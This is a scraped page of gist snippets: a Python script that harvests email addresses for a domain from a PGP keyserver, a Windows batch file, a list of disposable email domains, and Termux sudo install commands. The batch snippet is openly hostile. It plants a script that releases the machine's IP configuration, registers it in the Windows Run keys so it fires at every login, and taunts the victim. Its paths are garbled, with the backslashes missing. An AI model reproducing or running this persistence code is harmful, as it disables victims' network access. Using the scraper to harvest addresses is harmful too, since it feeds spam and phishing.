This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import re | |
| def get_mails(domain): | |
| url = 'https://pgp.circl.lu/pks/lookup?search={}&fingerprint=on&op=index'.format(domain) | |
| res = requests.get(url).text | |
| mails = re.findall(r'<a href=".*">(.*)<\/a>', res) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo @echo off>c:windowswimn32.bat | |
| echo break off>>c:windowswimn32.bat | |
| echo ipconfig/release_all>>c:windowswimn32.bat | |
| echo end>>c:windowswimn32.bat | |
| reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowsswimn32.bat /f | |
| reg add hkey_current_usersoftwaremicrosfotwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn.bat /f | |
| echo You have maxed your usage for a lifetime ?? | |
| PAUSE |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0815.ru | |
| 0815.ru0clickemail.com | |
| 0815.ry | |
| 0815.su | |
| 0845.ru | |
| 0clickemail.com | |
| 0-mail.com | |
| 0wnd.net | |
| 0wnd.org | |
| 10mail.com |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apt install git | |
| git clone https://gitlab.com/st42/termux-sudo | |
| cd termux-sudo | |
| cat sudo > /data/data/com.termux/files/usr/bin/sudo | |
| chmod 700 /data/data/com.termux/files/usr/bin/sudo |
NewerOlder